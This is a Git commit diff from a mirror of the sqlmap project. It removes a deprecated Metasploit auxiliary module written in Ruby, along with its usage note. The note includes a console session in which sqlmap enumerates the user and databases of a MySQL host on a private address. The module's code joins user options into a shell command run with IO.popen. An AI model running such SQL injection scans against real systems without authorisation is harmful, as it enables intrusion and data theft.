mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
removed deprecated metasploit module
This commit is contained in:
parent
05331d1eb0
commit
4940610f38
|
@ -1,78 +0,0 @@
|
||||||
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
|
|
||||||
the example below.
|
|
||||||
|
|
||||||
Note that if you are willing to run Metasploit's sqlmap auxiliary module on
|
|
||||||
through WMAP framework you first need to install sqlmap on your system or
|
|
||||||
add its file system path to the PATH environment variable.
|
|
||||||
|
|
||||||
|
|
||||||
$ ./msfconsole
|
|
||||||
|
|
||||||
_ _ _ _
|
|
||||||
| | | | (_) |
|
|
||||||
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
|
|
||||||
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
|
|
||||||
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|
|
||||||
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
|
|
||||||
| |
|
|
||||||
|_|
|
|
||||||
|
|
||||||
|
|
||||||
=[ msf v3.2-testing
|
|
||||||
+ -- --=[ 308 exploits - 173 payloads
|
|
||||||
+ -- --=[ 20 encoders - 6 nops
|
|
||||||
=[ 75 aux
|
|
||||||
|
|
||||||
msf > use auxiliary/scanner/http/wmap_sqlmap
|
|
||||||
msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
|
|
||||||
RHOSTS => 192.168.1.121
|
|
||||||
msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
|
|
||||||
PATH => /sqlmap/mysql/get_int.php
|
|
||||||
msf auxiliary(wmap_sqlmap) > set QUERY id=1
|
|
||||||
QUERY => id=1
|
|
||||||
msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
|
|
||||||
OPTS => --dbs --current-user
|
|
||||||
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
|
|
||||||
msf auxiliary(wmap_sqlmap) > show options
|
|
||||||
|
|
||||||
Module options:
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
BATCH true yes Never ask for user input, use the default behaviour
|
|
||||||
BODY no The data string to be sent through POST
|
|
||||||
METHOD GET yes HTTP Method
|
|
||||||
OPTS --dbs --current-user no The sqlmap options to use
|
|
||||||
PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
|
|
||||||
Proxies no Use a proxy chain
|
|
||||||
QUERY id=1 no HTTP GET query
|
|
||||||
RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
|
|
||||||
RPORT 80 yes The target port
|
|
||||||
SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
|
|
||||||
SSL false no Use SSL
|
|
||||||
THREADS 1 yes The number of concurrent threads
|
|
||||||
VHOST no HTTP server virtual host
|
|
||||||
|
|
||||||
msf auxiliary(wmap_sqlmap) > run
|
|
||||||
[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [*] starting at: 16:23:19
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
||||||
SQLMAP: back-end DBMS: MySQL >= 5.0.0
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: current user: 'testuser@localhost'
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: available databases [3]:
|
|
||||||
SQLMAP: [*] information_schema
|
|
||||||
SQLMAP: [*] mysql
|
|
||||||
SQLMAP: [*] test
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP:
|
|
||||||
SQLMAP: [*] shutting down at: 16:23:21
|
|
||||||
SQLMAP:
|
|
||||||
[*] Auxiliary module execution completed
|
|
||||||
msf auxiliary(wmap_sqlmap) >
|
|
|
@ -1,105 +0,0 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
|
||||||
# Framework web site for more information on licensing and terms of use.
|
|
||||||
# http://metasploit.com/framework/
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
|
||||||
include Msf::Auxiliary::WMAPScanUniqueQuery
|
|
||||||
include Msf::Auxiliary::Scanner
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'SQLMAP SQL Injection External Module',
|
|
||||||
'Description' => %q{
|
|
||||||
This module launch a sqlmap session.
|
|
||||||
sqlmap is an automatic SQL injection tool developed in Python.
|
|
||||||
Its goal is to detect and take advantage of SQL injection
|
|
||||||
vulnerabilities on web applications. Once it detects one
|
|
||||||
or more SQL injections on the target host, the user can
|
|
||||||
choose among a variety of options to perform an extensive
|
|
||||||
back-end database management system fingerprint, retrieve
|
|
||||||
DBMS session user and database, enumerate users, password
|
|
||||||
hashes, privileges, databases, dump entire or user
|
|
||||||
specific DBMS tables/columns, run his own SQL SELECT
|
|
||||||
statement, read specific files on the file system and much
|
|
||||||
more.
|
|
||||||
},
|
|
||||||
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
|
|
||||||
'License' => BSD_LICENSE,
|
|
||||||
'Version' => '$Revision: 9212 $',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['URL', 'http://www.sqlmap.org'],
|
|
||||||
]
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('METHOD', [ true, "HTTP Method", 'GET' ]),
|
|
||||||
OptString.new('PATH', [ true, "The path/file to test for SQL injection", 'index.php' ]),
|
|
||||||
OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
|
|
||||||
OptString.new('DATA', [ false, "The data string to be sent through POST", '' ]),
|
|
||||||
OptString.new('OPTS', [ false, "The sqlmap options to use", ' ' ]),
|
|
||||||
OptPath.new('SQLMAP_PATH', [ true, "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]),
|
|
||||||
OptBool.new('BATCH', [ true, "Never ask for user input, use the default behaviour", true ])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Modify to true if you have sqlmap installed.
|
|
||||||
def wmap_enabled
|
|
||||||
false
|
|
||||||
end
|
|
||||||
|
|
||||||
# Test a single host
|
|
||||||
def run_host(ip)
|
|
||||||
|
|
||||||
sqlmap = datastore['SQLMAP_PATH']
|
|
||||||
|
|
||||||
if not sqlmap
|
|
||||||
print_error("The sqlmap script could not be found")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
data = datastore['DATA']
|
|
||||||
method = datastore['METHOD'].upcase
|
|
||||||
|
|
||||||
sqlmap_url = (datastore['SSL'] ? "https" : "http")
|
|
||||||
sqlmap_url += "://" + wmap_target_host + ":" + wmap_target_port
|
|
||||||
sqlmap_url += "/" + datastore['PATH']
|
|
||||||
|
|
||||||
if method == "GET"
|
|
||||||
sqlmap_url += '?' + datastore['QUERY']
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = sqlmap + ' -u \'' + sqlmap_url + '\''
|
|
||||||
cmd += ' --method ' + method
|
|
||||||
cmd += ' ' + datastore['OPTS']
|
|
||||||
|
|
||||||
if not data.empty?
|
|
||||||
cmd += ' --data \'' + data + '\''
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['BATCH'] == true
|
|
||||||
cmd += ' --batch'
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("exec: #{cmd}")
|
|
||||||
IO.popen( cmd ) do |io|
|
|
||||||
io.each_line do |line|
|
|
||||||
print_line("SQLMAP: " + line.strip)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user